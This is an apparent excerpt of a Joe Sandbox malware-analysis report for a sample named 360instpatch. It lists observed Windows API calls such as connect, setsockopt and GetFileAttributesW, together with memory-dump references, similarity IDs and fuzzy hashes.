                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: connect
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1959786783-0
                                                                                                                                                                                                              • Opcode ID: dfd5ab7d5096a0d6900545522bc6de494c3042ca87cffb59bf81b50bdc5bdf2d
                                                                                                                                                                                                              • Instruction ID: 6f16a2cf02b08780c1190ae8458e18a03bec76f08e9ba485e08e066056f2722a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dfd5ab7d5096a0d6900545522bc6de494c3042ca87cffb59bf81b50bdc5bdf2d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1AD0177A210100EFC7058B60C894A997BA2BF5D325F20829DF16A8A1B2C332C8A2DF00
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(000000FF,6BF0FE4F,?,00000001,00000000,00000000,00000000,000000FF,00000001,6BFCC288,00000000), ref: 6BEFAF8E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • setsockopt.WS2_32(?,00000000,00000000,00000000,00000000), ref: 6BF2FF6B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: setsockopt
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3981526788-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _strlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4218353326-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcslen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 176396367-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000002,00B48D5A,00000000,?,00B86919,FFFFFEE2,00000002,?,00000000,00000000,00000748,00B86A2D,?,00000000,00000000), ref: 00B86B71
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4120199942.000000006CD21000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CD20000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6cd20000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __wfsopen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 197181222-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ioctlsocket.WS2_32(?,?,?), ref: 6BF2FED2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ioctlsocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3577187118-0
                                                                                                                                                                                                              • Opcode ID: 9cabc97c80fe240f8d6f044525bd3de8fa8dae014d8d247d96f7c6984bd27f13
                                                                                                                                                                                                              • Instruction ID: 5f1a80f7b618c9765d4a36eb347988cffcef1dfc7f1123869a599f8e78f02bbd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9cabc97c80fe240f8d6f044525bd3de8fa8dae014d8d247d96f7c6984bd27f13
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 77C08C3B114001ABCB050B20CC0888EBE61BF59320B20C65CB0A6C00F0C332C4B1EB00
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CallWindowProcW.USER32(6CD89C7E,00000000,?,?,?), ref: 6CD2847C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4120199942.000000006CD21000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CD20000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120169906.000000006CD20000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120288463.000000006CE05000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120321049.000000006CE29000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE2B000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE30000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE4B000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE4F000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120454362.000000006CE50000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120497160.000000006CE56000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6cd20000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CallProcWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2714655100-0
                                                                                                                                                                                                              • Opcode ID: 42188f035766040b14941c688ab0973e6a116f7b25ca0360455ff2aa59ba4c53
                                                                                                                                                                                                              • Instruction ID: c27c32251c5a1589047d994ce2fb9f9906fc827b15887cf080fa363b9fe90491
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 42188f035766040b14941c688ab0973e6a116f7b25ca0360455ff2aa59ba4c53
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 12C0013A108200FFCE024B80C904C0ABFB2BB99325B10C84CF2A90803183338432EF52
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FreeLibraryAndExitThread.KERNEL32(6BEE0000,00000000,6BEEA86A), ref: 6BEEA570
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExitFreeLibraryThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4122534561-0
                                                                                                                                                                                                              • Opcode ID: 8300f104dfc158ec2273089e7ec4c8ec4ecf2fe5061392b1722186bb1913ebaa
                                                                                                                                                                                                              • Instruction ID: 6c3dd56ae423b20750eaa2cc6e5b356a3de6cbfdd9afa4f68efc705da7800fbe
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8300f104dfc158ec2273089e7ec4c8ec4ecf2fe5061392b1722186bb1913ebaa
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 80B01230F6020197EE109E348C09F213AB8B712751F20C0C47000E2190D724E11CCD30
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PostMessageW.USER32(?,000007E9,?,?), ref: 00B467E0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessagePost
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 410705778-0
                                                                                                                                                                                                              • Opcode ID: 351c7a1d1f65b2552683aba4f53bf96fa87a33f8bcd2a7ed6956fcbb3ced9b3f
                                                                                                                                                                                                              • Instruction ID: df361ea30801ecf53986cd32e97f7eadf339e912f0eb3e5b74b248e53850b133
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 351c7a1d1f65b2552683aba4f53bf96fa87a33f8bcd2a7ed6956fcbb3ced9b3f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0EB0923A909281FFCA029B60CD09C8EBE72BBA8384F008449B28815070C63280B0EF02
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • TlsGetValue.KERNEL32(00000018), ref: 00B329E6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                              • Opcode ID: 483d73001bc466ad1c44b1a2bf429b592d4eb630cc95fbc2a31fb5d1e165e6b0
                                                                                                                                                                                                              • Instruction ID: e51e519a14ab2f93491e63fcb3077a860436d6f12445af45c6189a35ac17c9ac
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 483d73001bc466ad1c44b1a2bf429b592d4eb630cc95fbc2a31fb5d1e165e6b0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44D0C935108100FFCB015BB89D4582A7BE6EB88330FB08F68F576C20A0CB35CC10AB12
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,00B569EF,00B568D3,00000000,00000000,00000001,00000000,00000000,?,00000000,00000000,?,00B574F6,?,&pid=), ref: 00B5696A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseHandle
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2962429428-0
                                                                                                                                                                                                              • Opcode ID: d1ae4bb288b29075e621f036a6517307691bd47df156d8828cede8c4fa0124f6
                                                                                                                                                                                                              • Instruction ID: 510025b6ba8296328a8a40b2aa14aa137d2dd558fd9b9c1d7863a82ea857af9d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d1ae4bb288b29075e621f036a6517307691bd47df156d8828cede8c4fa0124f6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17D0A7710007018BC7304F24E508752B7F8AF04B36F244B4DA4B6C35D1C7B0E8448B54